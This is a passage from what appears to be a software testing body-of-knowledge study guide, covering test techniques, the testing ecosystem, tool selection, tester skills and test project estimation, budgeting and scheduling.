Risk-based testing requires the professional tester to look at the application from as many
viewpoints as possible on the likelihood of failure and the impact of a failure should it occur.
1. Make a list of risks. This process should include all stakeholders and must consider
both process risks and product risks.
5. With each iteration and the removal of defects (reduced risk), reevaluate and re-
prioritize tests.
In Model-based Testing test cases are based on a simple model of the application. Generally,
models are used to represent the desired behavior of the application being tested. The
behavioral model of the application is derived from the application requirements and
specification. It is not uncommon that the modeling process itself will reveal inconsistencies
and deficiencies in the requirements and is an effective static test process. Test cases derived
from the model are functional tests, so model-based testing is generally viewed as black-box
testing.
The term “Exploratory Testing” was coined in 1983 by Dr. Cem Kaner. Dr. Kaner defines
exploratory testing as “a style of software testing that emphasizes the personal freedom and
responsibility of the individual tester to continually optimize the quality of his/her work by
treating test-related learning, test design, test execution, and test result interpretation as
mutually supportive activities that run in parallel throughout the project.” Exploratory
Testing is aligned with the Context Driven testing school of thought.
Exploratory testing has always been performed by professional testers. The Exploratory
Testing style is quite simple in concept; the tester learns things that, together with experience
and creativity, generates new good tests to run. Exploratory testing seeks to find out how the
software actually works and to ask questions about how it will handle difficult and easy cases.
The quality of the testing is dependent on the tester’s skill of inventing test cases and finding
defects. The more the tester knows about the product and different test methods, the better the
testing will be.
Exploratory testing is not a test technique but rather a style of testing used throughout the
application life cycle. According to Dr. Kaner and James Bach, exploratory testing is more a
mindset, “a way of thinking about testing,” than a methodology. As long as the tester is
thinking and learning while testing and subsequent tests are influenced by the learning, the
tester is performing exploratory testing.
Keyword-driven testing, also known as table-driven testing or action word based testing, is a
testing methodology whereby tests are driven wholly by data. Keyword-driven testing uses a
table format, usually a spreadsheet, to define keywords or action words for each function that
will be executed. In Keyword-driven tests the data items are not just data but also the names of
specific functions being tested and their arguments which are then executed as the test runs.
Keyword-driven testing is well suited for the non-technical tester. KDT also allows
automation to be started earlier in the SDLC and has a high degree of reusability.
product designed is structurally sound and will function correctly. It attempts to determine that
the technology has been used properly and that when all the component parts are assembled
they function as a cohesive unit. Structural System Testing could be more appropriately
labeled as testing tasks rather than techniques, as Structural System Testing provides the
facility for determining that the implemented configuration and its interrelationship of parts
function so that they can perform the intended tasks. These test tasks are not designed to
ensure that the application system is functionally correct, but rather that it is structurally
sound. Examples of structural system testing tasks are shown in Table 1-10.
Stress testing is designed to determine if the system can function when subjected to large
volumes of work. The areas that are stressed include input transactions, internal tables, disk
space, output, communications, computer capacity, and interaction with people. If the
application functions adequately under stress, it can be assumed that it will function properly
with normal volumes of work.
Execution testing determines whether the system achieves the desired level of proficiency in a
production status. Execution testing can verify response times, turnaround times, as well as
design performance. The execution of a system can be tested in whole or in part using the
actual system or a simulated model of a system.
Recovery is the ability to restart operations after the integrity of the application has been lost.
The process normally involves reverting to a point where the integrity of the system is known,
and then processing transactions up to the point of failure. The time required to recover
operations is affected by the number of restart points, the volume of applications run on the
computer center, the training and skill of the people conducting the recovery operation, and
the tools available for recovery. The importance of recovery will vary from application to
application.
Compliance testing verifies that the application was developed in accordance with
information technology standards, procedures, and guidelines. The methodologies are used to
increase the probability of success, to enable the transfer of people in and out of the project
with minimal cost, and to increase the maintainability of the application system. The type of
testing conducted varies on the phase of the system development life cycle. However, it may
be more important to compliance test adherence to the process during requirements than at
later stages in the life cycle because it is difficult to correct applications when requirements
are not adequately documented.
White-box testing assumes that the path of logic in a unit or program is known. White-box
testing consists of testing paths, branch by branch, to produce predictable results. The
following are white-box testing techniques:
Functional system testing ensures that the system requirements and specifications are
achieved. The process involves creating test conditions for use in evaluating the correctness of
the application. Examples of Functional System Testing are shown in Table 1-11
Requirements testing verifies that the system can perform its function correctly and that the
correctness can be sustained over a continuous period of time. Unless the system can function
correctly over an extended period of time, management will not be able to rely upon the
system. The system can be tested for correctness throughout the life cycle, but it is difficult to
test the reliability until the program becomes operational. Requirements testing is primarily
performed through the creation of test conditions and functional checklists. Test conditions
are generalized during requirements and become more specific as the SDLC progresses
leading to the creation of test data for use in evaluating the implemented application system.
Error-handling testing determines the ability of the application system to properly process
incorrect transactions. Error-handling testing requires a group of knowledgeable people to
anticipate what can go wrong with the application system in an operational setting. Error-
handling testing should test the error condition is properly corrected. This requires error-
handling testing to be an iterative process in which errors are first introduced into the system,
then corrected, then reentered into another iteration of the system to satisfy the complete
error-handling cycle.
Parallel testing requires that the same input data be run through two versions of the same
application. Parallel testing can be done with the entire application or with a segment of the
application. Sometimes a particular segment, such as the day-to-day interest calculation on a
savings account, is so complex and important that an effective method of testing is to run the
new logic in parallel with the old logic.
Black-box testing focuses on testing the function of the program or application against its
specification. Specifically, this technique determines whether combinations of inputs and
operations produce expected results. The following are black-box testing techniques. Each
technique is discussed in detail in Skill Category 7.
Boundary Value Analysis is a data selection technique in which test data is chosen from the
“boundaries” of the input or output domain classes, data structures, and procedure parameters.
Choices often include the actual minimum and maximum boundary values, the maximum
value plus or minus one, and the minimum value plus or minus one.
A technique useful for analyzing logical combinations of conditions and their resultant actions
to minimize the number of test cases needed to test the program’s logic.
An analysis of the system to determine a finite number of different states and the transitions
from one state to another. Tests are then based on this analysis.
A combinatorial method that for each pair of input parameters tests all possible discrete
combinations of those parameters.
Cause-Effect Graph is a technique that graphically illustrates the relationship between a given
outcome and all the factors that influence the outcome.
Error Guessing is a test data selection technique for picking values that seem likely to cause
defects. This technique is based on the intuition and experience of the tester.
• Accessibility Testing
• Conversion Testing
• Maintainability Testing
• Reliability Testing
• Stability Testing
• Usability Testing
• Bottom-up
Begin testing from the bottom of the hierarchy and work up to the top. Modules are added
in ascending hierarchical order. Bottom-up testing requires the development of driver
modules, which provide the test input, that call the module or program being tested, and
display test output.
Within the context of incremental testing, test stubs and drivers are often referred to as a test
harness. This is not to be confused with the term test harness used in the context of test
automation.
When testing client/server applications, these techniques are extremely critical. An example
of an effective strategy for a simple two-tier client/server application could include:
2. Unit and incremental testing of the GUI (graphical user interface) or client components
4. Thread testing of a valid business transaction through the integrated client, server, and
network
Table 1-12 illustrates how the various techniques can be used throughout the standard test
stages.
Technique
Stages White-Box Black-Box Incremental Thread
Unit Testing X
String/Integration X X X X
Testing
System Testing X X X
Acceptance X
Testing
It is important to note that when evaluating the paybacks received from various
test techniques, white-box or program-based testing produces a higher defect
yield than the other dynamic techniques when planned and executed correctly.
Skill
Category
2
Building the Software Testing
Ecosystem
E
cosystem - a community of organisms together with their physical environment,
viewed as a system of interacting and interdependent relationships.1
If the pages of this STBOK talked only to the issues of writing a test case, developing
a test plan, recording a defect, or testing within an Agile framework, the most important
success factor would have been overlooked, the software testing ecosystem. Like any thriving
ecosystem, a thriving testing ecosystem requires balanced interaction and interdependence.
Not unlike the three-legged stool of people, process, and technology, if one leg is missing, the
stool will not fulfill its objective. A successful software testing ecosystem must include the
right organizational policies, procedures, culture, attitudes, rewards, skills, and tools.
1. The American Heritage® Science Dictionary, Copyright © 2002. Published by Houghton Mifflin.
All rights reserved.
depends first and foremost on humble, curious, and enlightened leadership. Without that the value
of the ecosystem is greatly diminished.
An organization’s objectives and the way they are achieved are based on preferences, value
judgments, and management styles. Those preferences and value judgments, which are
translated into standards of behavior, reflect management’s integrity and its commitment to
ethical values.
Ethical behavior and management integrity are products of the “corporate culture.” Corporate
culture includes ethical and behavioral standards, how they are communicated, and how they
are reinforced in practice. Official policies specify what management wants to happen.
Corporate culture determines what actually happens and which rules are obeyed, bent, or
ignored.
Individuals may engage in dishonest, illegal, or unethical acts simply because their
organizations give them strong incentives to do so. Emphasis on “results,” particularly in the
short term, fosters an environment in which the price of failure becomes very high.
Removing or reducing incentives can go a long way toward diminishing undesirable behavior.
Setting realistic performance targets is a sound motivational practice; it reduces
counterproductive stress as well as the incentive for fraudulent reporting that unrealistic
targets create. Similarly, a well-controlled reporting system can serve as a safeguard against a
temptation to misstate results.
The most effective way of transmitting a message of ethical behavior throughout the
organization is by example. People imitate their leaders. Employees are likely to develop the
same attitudes about what’s right and wrong as those shown by top management. Knowledge
that the CEO has “done the right thing” ethically when faced with a tough business decision
sends a strong message to all levels of the organization.
Setting a good example is not enough. Top management should verbally communicate the
entity’s values and behavioral standards to employees. This verbal communication must be
backed up by a formal code of corporate conduct. The formal code is “a widely used method
of communicating to employees the company’s expectations about duty and integrity.” Codes
address a variety of behavioral issues, such as integrity and ethics, conflicts of interest, illegal
or otherwise improper payments, and anti-competitive arrangements. While codes of conduct
can be helpful, they are not the only way to transmit an organization’s ethical values to
employees, suppliers, and customers.
Management has an important function assigning authority and responsibility for operating
activities and establishment of reporting relationships and authorization protocols. It involves
the degree to which individuals and teams are encouraged to use initiative in addressing issues
and solving problems, as well as limits of their authority. There is a growing tendency to push
authority downward in order to bring decision-making closer to front-line personnel. An
organization may take this tact to become more market-driven or quality focused–perhaps to
eliminate defects, reduce cycle time or increase customer satisfaction. To do so, the
organization needs to recognize and respond to changing priorities in market opportunities,
business relationships, and public expectations.
Another challenge is ensuring that all personnel understand the objectives of the ecosystem. It
is essential that each individual know how his or her actions interrelate and contribute to
achievement of the objectives.
It is also critical that the work processes represent sound policies, standards, and procedures.
It must be emphasized that the purposes and advantages of standards exist only when sound
work processes are in place. If the processes are defective or out of date, the purposes will not
be met. Poor standards can, in fact, impede quality and reduce productivity.
Policies provide direction, standards are the rules or measures by which the implemented
policies are measured, and the procedures are the means used to meet or comply with the
standards. These definitions show the policy at the highest level, standards established next,
and procedures last. However, the worker sees a slightly different view, which is important in
explaining the practical view of standards.
The objective of the workbench is to produce the defined output products (deliverables) in a
defect-free manner. The procedures and standards established for each workbench are
designed to assist in this objective. If defect-free products are not produced, they should be
reworked until the defects are removed or, with management’s concurrence, the defects can be
noted and the defective products passed to the next workbench.
Many of the productivity and quality problems within the test function are attributable to the
incorrect or incomplete definition of tester’s workbenches. For example, workbenches may
not be established, or too few may be established. A test function may only have one
workbench for software test planning, when in fact, it should have several; such as, a
budgeting workbench, a scheduling workbench, a risk assessment workbench, and a tool
selection workbench. In addition, they may have an incompletely defined test data workbench
that leads to poorly defined test data for whatever tests are made at the workbench, which has
not been fully defined.
The worker performs defined procedures on the input products in order to produce the output
products. The procedures are step-by-step instructions that the worker follows in performing
his/her tasks. Note that if tools are to be used, they are incorporated into the procedures.
The standards are the measures that the worker uses to validate whether or not the products
have been produced according to specifications. If they meet specifications, they are quality
products or defect-free products. If they fail to meet specifications or standards, they are
defective and subject to rework.
It is the execution of the workbench that defines product quality and is the basis for
productivity improvement. Without process engineering, the worker has little direction or
guidance to know the best way to produce a product and to determine whether or not a quality
product has been produced.
To understand the testing process, it is necessary to understand the workbench concept. In IT,
workbenches are more frequently referred to as phases, steps, or tasks. The workbench is a
way of illustrating and documenting how a specific activity is to be performed.
The workbench and the software testing process, which is comprised of many workbenches,
are illustrated in Figure 2-2.
The workbench concept can be used to illustrate one of the steps involved in testing software
systems. The tester’s unit test workbench consists of these steps:
3. Work is checked to ensure the unit meets specifications and standards, and that the
procedure was followed.
4. If check finds no problems, the product is released to the next workbench (e.g.,
integration testing).
IT management is responsible for issuing IT policy. Policies define the intent of management,
define direction, and, by definition, are general rules or principles. It is the standards that will
add the specificity needed for implementation of policies. For example, the test team needs
direction in determining how many defects are acceptable in the product under test. If there is
no policy on defects, each worker decides what level of defects is acceptable.
The workers who use the procedures and are required to comply with the standards should be
responsible for the development of those standards and procedures. Management sets the
direction and the workers define that direction. This division permits each to do what they are
best qualified to do. Failure to involve workers in the development of standards and
procedures robs the company of the knowledge and contribution of the workers. In effect, it
means that the people best qualified to do a task (i.e., development of standards and
procedures) are not involved in that task. It does not mean that every worker develops his own
procedures and standards, but that the workers have that responsibility and selected workers
will perform the tasks.
Please note that the software testers should be the owners of test processes—and thus
involved in the selection, development, and improvement of test processes.
One of the best known process improvement models is the Plan-Do-Check-Act model for
continuous process improvement. The PDCA model was developed in the 1930s by Dr.
Walter Shewhart of Bell Labs. The PDCA model is also known as the Deming circle/cycle/
wheel, the Shewhart cycle, and the control circle/cycle. A brief description of the four
components of the PDCA concept are provided below and are illustrated in Figure 2-3.
Create the conditions and perform the necessary teaching and training to execute the plan.
Make sure everyone thoroughly understands the objectives and the plan. Teach workers the
procedures and skills they need to fulfill the plan and thoroughly understand the job. Then,
perform the work according to these procedures.
Check to determine whether work is progressing according to the plan and whether the
expected results are obtained. Check for performance of the set procedures, changes in
conditions, or abnormalities that may appear. As often as possible, compare the results of the
work with the objectives.
If your checkup reveals that the work is not being performed according to plan or that results
are not as anticipated, devise measures for appropriate action.
If a check detects an abnormality–that is, if the actual value differs from the target value–
search for the cause of the abnormality and eliminate the cause. This will prevent the
recurrence of the defect. Usually you will need to retrain workers and revise procedures to
eliminate the cause of a defect.
Continuous process improvement is not achieved by a one time pass around the PDCA cycle.
It is by repeating the PDCA circle continuously that process improvement happens. This
concept is best illustrated by an ascending spiral as shown in Figure 2-4.
Testers testing software developed by a specific software development methodology need to:
3. Identify compatible and incompatible test activities associated with the development
methodology
4. Customize the software test methodology to effectively test the software based on the
specific development methodology used to build the software
In the previous release of the Software Testing Common Body of Knowledge, the Test
Environment components were identified as management support for testing, test processes, test
tools, and a competent testing team. This might sound familiar as those components are now
defined as the software testing ecosystem (this skill category of the STBOK). The review
committee working on the STBOK update decided that defining the Test Environment in such
broad terms was inconsistent with the more contemporary definition which defines the Test
Environment in terms more closely related to the actual testing process. Focusing on a more
technical description of a Test Environment still leaves questions about how discrete and separate
the test environment will be. Is there a test lab? If there is a test lab, is it brick and mortar or a
virtualized test lab?
In the end, the goal of the test environment is to cause the application under test to exhibit true
production behavior while being observed and measured outside of its production
environment.
Understanding the SDLC methodology and what levels of testing will be performed allows
for the development of a checklist for building the Test Environment.
The test environment takes on a variety of potential implementations. In many cases, the test
environment is a “soft” environment segregated within an organization’s development system
allowing for builds to be loaded into the environment and test execution to be launched from
the tester’s normal work area. Test labs are another manifestation of the test environment
which is more typically viewed as a brick and mortar environment (designated, separated,
physical location).
The implementation of and updates to production software impacts the processes and people
using the application solution. To test this impact, the software test team, along with business
stakeholders and process and system experts, need a replica of the impacted business function.
Model office should be an “exact model” defined in both business and technology terms. The
key to the implementation of a Model Office is the process and workflow maps diagramming
how things happen. This should include the who, what, and when of the business process
including manual processing, cycles of business activity, and the related documentation. Like
any testing activity, clearly defining the expected outcomes is critical. The development of the
Model Office requires a detailed checklist like the one listed for the environment checklist
described in 2.3.3.1 above.
Testing performed in the Model Office are generally complete, end-to-end processing of the
customer’s request using actual hardware, software, data, and other real attributes. The
advantage of testing in a Model Office environment is that all the stakeholders get the
opportunity to see the impact on the organization before the changed system is moved into
production.
2.3.4 Virtualization
The concept of virtualization (within the IT space) usually refers to
running multiple operating systems on a single machine. By its Terminology
very definition, a virtual “server” is not an actual server but a
Virtualization
virtual version of the real thing. A familiar example of
virtualization is running a Mac OS on a Windows machine or
running Windows on a Mac OS system. Virtualization software allows a computer to run
several operating systems at the same time. The obvious advantage of virtualization is the
ability to run various operating systems or applications on a single system without the expense
of purchasing a native system for each OS.
The reality of setting up a test environment is that the financial costs associated with
potentially duplicating all the production systems that would be required to validate all
systems under test would be infeasible. Virtualization offers a potential solution. The ability to
establish several virtual systems on a single physical machine considerably increases the IT
infrastructure flexibility and the efficiency of hardware usage.
However, there are challenges to using virtualization when setting up a test environment. Not
all operating environments or devices can be emulated by a virtual environment. The
configuration of a virtual system can be complex and not all systems will support
virtualization. There may be equipment incompatibilities or issues with device drivers
between the native OS and the virtual OS.
Testing in a virtual environment provides many benefits to the test organization and can
provide excellent ROI on test dollars. However, in the end, the final application must be tested
in a real operating environment to ensure that the application will work in production.
The testing organization should select which testing tools they want used in testing and then
incorporate their use into the testing procedures. Tool usage is not optional but mandatory.
However, a procedure could include more than one tool and give the tester the option to select
the most appropriate one given the testing task to be performed.
Equally important is the understanding that the decision to automate and the tool selected
should be a result of specific need and careful analysis. There are too many cases of
unsuccessful automated tool implementation projects that almost always find a root cause in
poor planning and execution of the acquisition process. A detailed tool acquisition process is
given in section 2.5.
The software test automation industry today is represented by an array of companies and
technologies. Commercial tool companies, some with roots going back to the 1980’s, have
provided robust tool sets across many technologies. In contrast to the commercial tool
products are the open source test tools. Both commercial and open source tools can provide
significant value to the software test organization when intelligent implementation is
followed. The most important concept is to understand the needs and from that discern the
true cost of ownership when evaluating commercial versus open source options. Note: While
the term “commercial” tool is generally accepted as defined within the context of this
discussion, “proprietary” would be a more accurate term as there are commercial open source
tools on the market as well as proprietary free tools.
Commercial automated test tools have been around for many years. Their evolution has
followed the evolution of the software development industry. Within the commercial test tools
category there are major players represented by a handful of large IT companies and the
second tier tools companies which are significant in number and are growing daily.
Shown below are “generalized” statements about both the positive and negative aspects of
commercial tools. Each item could reasonably have the words “may be” in front of the
statement (e.g., may be easy to use). Characteristics of commercial tools include:
• Positives
Maturity of the product
Stability of the product
Mature implementation processes
Ease of use
Availability of product support teams
Substantial user base
Number of testers already familiar with tools
Significant third party resources in training and consulting
Out-of-the-box implementation with less code customization
More efficient code
2. Silk Test is a registered trademark of the Borland Corporation (a Micro Focus Company).
3. Mobile Labs Trust is a registered trademark of Mobile Labs.
A lower risk recommendation (old saying: “No one ever got fired for buying
IBM.”)
• Negatives
Expensive licensing model
Require high priced consultants
Expensive training costs
Custom modifications require specialized programming skills using knowledge of
the proprietary language
Less flexibility
Shown below are “generalized” statements about both the positive and negative aspects of
open source tools. Each item could reasonably have the words “may be” in front of the
statement (e.g., may be more flexibility).
The positive and negative aspects of open source automated tools include:
• Positives
Lower cost of ownership
More flexibility
Easier to make custom modifications
Innovative technology
Continuing enhancements through open source community
Based on standard programming languages
Management see as “faster, cheaper, better”
Easier procurement
• Negatives
Open source tool could be abandoned
No single source of support
Test or development organization is not in the business of writing automated tools
Fewer testers in marketplace with knowledge of tool
4. Dictionary.com Unabridged. Based on the Random House Dictionary, © Random House, Inc. 2014.
The notion that an open source tool is free is a dangerous misconception. While one advantage
of open source may be lower cost of ownership, in reality the opportunity costs to the testing
and/or development organization to dedicate resources to something for which a COTS
(commercial off the shelf) product exists needs to be carefully analyzed. A decision about
commercial versus open source should never be first and foremost about the costs but about
what is the right tool for the right job. Section 2.5 discusses the Tool Acquisition process.
A debate often occurs regarding the value of specialized tools designed to meet a relatively
narrow objective versus a more generalized tool that may have functionality that covers the
specific need but at a much higher or less detailed level along with other functionality that
may or may not be useful to the acquiring organization. Within the automated test tool
industry, the debate is alive and well. Some organizations have developed niche tools that
concentrate on a very specific testing need. Generalized testing tools focus on providing a
testing experience across a wider swath of the life cycle. In many cases the specialized tools
have interfaces to the larger generalized tools which, when coupled together, provide the best
of both worlds. Regardless, understanding the test automation need should drive tool
acquisition.
There are literally hundreds of tools available for testers. At the most general level, our
categorization of tools relates primarily to the test process that is automated by the tool. The
most commonly used tools can be grouped into these eight areas:
• Automated Regression Testing Tools Tools that can capture test conditions and
results for testing new versions of the software.
• Defect Management Tools Tools that record defects uncovered by testers and then
maintain information on those defects until they have been successfully addressed.
• Performance/Load Testing Tools Tools that can “stress” the software. The tools are
looking for the ability of the software to process large volumes of data without either
losing data, returning data to the users unprocessed, or have significant reductions in
performance.
• Manual Tools One of the most effective of all test tools is a simple checklist
indicating either items that testers should investigate or to enable testers to ensure they
have performed test activities correctly. There are many manual tools such as decision
tables, test scripts used to enter test transactions, and checklists for testers to use when
performing testing techniques such as reviews and inspections.
• Traceability Tools One of the most frequently used traceability tools is to trace
requirements from inception of the project through operations.
• Code Coverage Tools that can indicate the amount of code that has been executed
during testing. Some of these tools can also identify non-entrant code.
• Specialized Tools This category includes tools that test GUI, security, and mobile
applications.
Most testing organizations agree that if the following three guidelines are adhered to tool
usage will be more effective and efficient.
• Guideline 1 Testers should not be permitted to use tools for which they have not
received formal training.
• Guideline 2 The use of test tools should be incorporated into test processes so that
the use of tools is mandatory, not optional.
• Guideline 3 Testers should have access to an individual in their organization, or the
organization that developed the tool, to answer questions or provide guidance on using
the tool.
2.4.2.1 Advantages
• Relentlessness Tests can be run, day and night, 24 hours a day potentially delivering
the equivalent of the efforts of several full-time testers in the same time period.
• Simulate Load Automated testing can simulate thousands of virtual users
interacting with the application under test.
• Efficiency Automating boring repetitive tasks not only improves employee morale,
but also frees up time for staff to pursue other tasks they otherwise could not or would
not pursue. Therefore, greater breadth and depth of testing is possible this way.
2.4.2.2 Disadvantages
The direct responsibility of both the individual and the organization that employs that individual is
to ensure the necessary competencies exist to fulfill the test organization’s objectives. However, the
individual has the primary responsibility to ensure that his/her competencies are adequate and
current. For example, if a tester today was conducting manual testing of Cobol programs, and that
tester had no other skill sets than testing Cobol programs, the probability of long-term employment
in testing is minimal. However, if that individual maintains current testing competencies by
continually learning new testing tools and techniques, that individual is prepared for new
assignments, new job opportunities, and promotions.
In Skill Category 1, the software testing style known as “Exploratory Testing” was described.
In that section it stated, “The Exploratory Testing style is quite simple in concept; the tester
learns things that together with experience and creativity generates new good tests to run.”
The ability to be a creative thinker, to “think outside the box,” and formulate new, better ways
to test the application relies not on a “textbook” solution but a cognitive exercise on the part of
the tester to solve a problem. This type of skill, while dependent in many ways on the
collective lifetime experience of the individual, can be taught and improved over time.
Aligned with the discussion of practical skills is the notion of Heuristics, a term popularized in
the software testing context by James Bach and Dr. Cem Kaner. Heuristic refers to
experience-based techniques for problem solving, learning, and discovery.
Soft skills are defined as the personal attributes which enable an individual to interact
effectively and harmoniously with other people. Skill Category 3 will describe in depth the
communication skills needed within the context of managing the test project. Surveys of
software test managers regarding what skills were considered most important for a software
tester reveal that the most important skill for a software tester is communication skills.
The ability to communicate, both in writing and verbally, with the various stakeholders in the
SDLC is critical. For example, the ability to describe a defect to the development team or to
effectively discuss requirements issues in a requirements walkthrough is crucial. Every tester
must posses excellent communication skills in order to communicate the issues in an effective
and efficient manner.
Soft skills are not confined just to communication skills. Soft skills may be used to describe a
person’s Emotional Quotient (EQ). An EQ is defined as the ability to sense, understand, and
effectively apply the power and acumen of emotions to facilitate high levels of collaboration
and productivity. Software testing does not happen in a vacuum. The software tester will be
engaged with many different individuals and groups and the effectiveness of that engagement
greatly impacts the quality of the application under test.
The term “technical skills” is a rather nebulous term. Do we define technical skills to mean
“programming capability”? Are technical skills required for white-box testing? Does
understanding SQL queries at a detailed level mean a tester has technical skills or does not
understanding SQL queries at a detailed level cast aspersions on a testers technical skills? The
STBOK defines technical skills as those skills relating directly to the process of software
testing. For example, writing a test case would require technical skills. Operating an
automated tool would require technical skills. The presence or absence of a particular
technical skill would be defined by the needs of the test project. If a project required
knowledge of SQL queries, then knowing SQL queries would be a technical skill that needs to
already exist or be acquired.
The majority of the content contained in the Software Testing Body of Knowledge relates to
technical skills. How to write a test plan, how to perform pairwise testing, or how to create a
decision table are skills that are described in the different skill categories.
In section 1.2.3.1 of Skill Category 1, the concept of two software quality gaps was discussed.
The first gap, referred to as the producer gap, describes the gap between what was specified
and what was delivered. The second gap, known as the customer gap, describes the gap
between the customer’s expectations and the product delivered. That section went on to state
that a significant role of the software tester is to help close these two gaps.
The practical and soft skills described in section 2.5.1.1 and 2.5.1.2 would be used by the
software tester to help close both the producer and customer gap. The technical skills
discussed in section 2.5.1.3 would primarily be used to close the producer gap. The domain
knowledge of the software tester would be used to close the customer gap.
Domain knowledge provides a number of benefits to the software test organization. They
include:
• Testing the delivery of a quality customer experience. Domain knowledge gives the
tester the ability to help “fine tune” the user interface, get the look and feel right, test
the effectiveness of reports, and ensure that operational bottlenecks are resolved.
• An understanding of what is important to the end user. Often times the IT team has
their own perception of what is important in an application. It often tends to be the big
issues. However, in many cases critical attributes of a system from the users stand
point may be as simple as the number of clicks needed to access a client record.
• Section 1.2.5 of Skill Category 1 described the Software Quality Factors and Criteria.
These factors are not business requirements (which typically define what a system
does), but rather the quality factors and criteria describe what a system “is” (what
makes it a good software system). Among these criteria are such attributes as
simplicity, consistency, and operability. These factors would be most effectively
evaluated by a tester who has the knowledge about what makes an application
successful within the operational environment.
Developing the capabilities of individuals within the software testing organization does not
just happen. A dedicated effort, which includes the efforts of both the test organization and the
individual, must be made. Working together, a road map for tester capability development can
be created which includes both development of skills and the capability to effectively utilize
those skills in daily work.
Figure 2-5 is typical of how a software testing organization may measure an individual
tester’s competency. This type of chart would be developed by the Human Resource
department to be used in performance appraisals. Based on the competency assessment in that
performance appraisal, raises, and promotions are determined.
3
Managing the Test Project
S
oftware testing is a project with almost all the same attributes as a software
development project. Software testing involves project planning, project staffing,
scheduling and budgeting, communicating, assigning and monitoring work, and
ensuring that changes to the project plan are incorporated into the test plan.
Logically the test plan would be developed prior to the test schedule and budget. However,
testers may be assigned a budget and then build a test plan and schedule that can be
accomplished within the allocated budget. The discussion in this skill category will include
planning, scheduling and budgeting as independent topics, although they are all related.
The six key tasks for test project administration are the planning, estimation which includes
budgeting and scheduling, staffing, and customization of the test process if needed. The plan
defines the steps of testing, estimation provides clarity on the magnitude of the tasks ahead,
the schedule determines the date testing is to be started and completed, the budget determines
the amount of resources that can be used for testing and test process customization assures the
test process will accomplish the test objectives.
Because testing is part of a system development project, its plan, budget, and schedule cannot
be developed independently of the overall software development plan, budget, and schedule.
The build component and the test component of a software development project need to be
integrated. In addition, these plans, schedules, and budgets may be dependent on available
resources from other organizational units, such as users.
Each of the six items listed should be developed by a process. These are the processes for
developing test planning, budgeting, scheduling, resourcing, and test process customization.
The results from those processes should be updated throughout the execution of the software
testing tasks. As conditions change so must the plan, budget, schedule, and test process. These
are interrelated variables and changing one has a direct impact on the other three.
3.1.2 Estimation
As part of the test planning process, the test organization must develop estimates for budget
and scheduling of software testing processes.
At the heart of any estimate is the need to understand the size of the “object” being estimated.
It would be unrealistic to ask a building contractor to estimate the cost of building a house
without providing the information necessary to understand the size of the structure. Likewise,
to estimate how much time it will take to test an application before the application exists can
be daunting. As Yogi Berra, the famous New York Yankees catcher, once said, “It’s tough to
make predictions, especially about the future.” Unfortunately, predictions must be made for
both budget and schedule and a first step in this process is understanding the probable size of
the application.
There is no one correct way to develop an estimate of application size. Some IT organizations
use judgment and experience to create estimates; others use automated tools. The following
discussions represent some of the estimation processes but not necessarily the only ones. The
tester needs to be familiar with the general concept of estimation and then use those processes
as necessary.
Factors that influence estimation include but are not limited to:
• Development life cycle model used
• Requirements
• Past data
• Organization culture
• Selection of suitable estimation technique
• Personal experience
• Resources available
• Tools available
Remember, by definition an estimate means something that can change, and it will. It is a
basis on which decisions can be made. For this reason the test manager must continually
monitor the estimates and revise them as necessary. The importance of monitoring will vary
depending on the SDLC model and the life cycle phase of that the selected model.
Section 3.1.2 described a number of the methodologies for estimating the size and effort
required for a software development project and by logical extension the efforts required to
test the application. An estimate is, however, an ‘educated guess.’ The methods previously
described almost universally required some level of expert judgment. The ability, based on
experience, to compare historical figures with current project variables to make time and
effort predictions is Expert Judgment.
A budget, by contrast, is not an estimate, it is a plan that utilizes the results of those estimating
processes to allocate test and monetary resources for the test project. The testing budget,
regardless of the effort and precision used to create it, still has, as its foundation, the earlier
estimates. Each component that went into creating the budget requires as much precision as is
realistic; otherwise, it is wasted effort and useless to help manage the test project.
A budget or cost baseline, once established, should not be changed unless approved by the
project stakeholders as it is used to track variances against the planned cost throughout the
application life cycle.
3.1.4 Scheduling
A schedule is a calendar-based breakdown of tasks and deliverables. It helps the project
manager and project leader manage the project within the time frame and keep track of
current, as well as future problems. A Work Breakdown Structure helps to define the activities
at a broader level, such as who will do the activities, but planning is not complete until a
resource and time is attached to each activity. In simple terms, scheduling answers these
questions:
• What tasks will be done?
• Who will do them?
• When will they do them?
The process of adjusting a schedule based on staff constraints is called resource leveling.
Resource leveling involves accounting for the availability of staff when scheduling tasks.
Resource leveling will help in efficient use of the staff. Resource leveling is also used for
optimization. While resource leveling optimizes available staff, it does not ensure that all the
staff needed to accomplish the project objectives will be available at the time they are
required.
Once a schedule is made, it is possible that during certain phases some staff will be idle
whereas at a peak time, those same staff members will be paid overtime to complete the task.
This could happen as a result of delays by the development team deploying planned
application builds into the test environment. It is best to plan for such occurrences as they will
invariably happen.
Status reports are a major input to the schedule. Scheduling revolves around monitoring the
work progress versus work scheduled. A few advantages of scheduling are:
• Once a schedule is made, it gives a clear idea to the team and the management of the
roles and responsibility for each task
• It enables tracking
• It allows the project manager the opportunity to take corrective action
3.1.5 Resourcing
Ideally, staffing would be done by identifying the needed skills and then acquiring members
of the test project who possess those skills. It is not necessary for every member for the test
team to possess all the skills, but in total the team should have all the needed skills. In some IT
organizations, management assigns the testers and no determination is made as to whether the
team possesses all the needed skills. In that case, it is important for the test manager to
document the needed skills and the skills available from the team members. Gaps in needed
skills may be supplemented by such individuals assigned to the test project on a short-term
basis or by training the assigned resources.
The recommended test project staffing matrix is illustrated in Table 3-1. This matrix shows
that the test project has identified the needed skills. In this case they need the planning, test
data generation skills, and skills in using tools X and Y. The matrix shows there are four
potential candidates for assignment to that project. Assume that only two are needed for
testing, the test manager would then attempt to get the two that in total had all the four needed
skills.
If the test team does not possess the necessary skills, it is the responsibility of the test manager
to teach those individuals the needed skills. This training can be on-the-job training, formal
classroom training, or e-learning training.
Skills Needed
Staff Planning Test Data Tool X Tool Y
Generation
A X X
B X X X
C X X
D X X X
There are literally thousands of books written on how to supervise work. There is no one best
way on how to supervise a subordinate. However, most of the recommended approaches to
supervision include the following:
• Communication skills
The ability of the supervisor to effectively communicate the needed direction
information, and resolution of potential impediments to completing the testing tasks
effectively and efficiently.
• Negotiation and complaint resolution skills
Some specific skills needed to make a supervisor effective, like resolving complaints,
using good judgment, and knowing how to provide constructive criticism.
• Project relationships
Developing effective working relationships with the test project stakeholders.
• Motivation, Mentoring, and Recognition
Encouraging individuals to do their best, supporting individuals in the performance of
their work tasks, and rewarding individuals for effectively completing those tasks.
4
Risk in the Software
Development Life Cycle
I
t is often stated that a primary goal of a software tester is to reduce the risk associated
with the deployment of a software application system. The very process of test
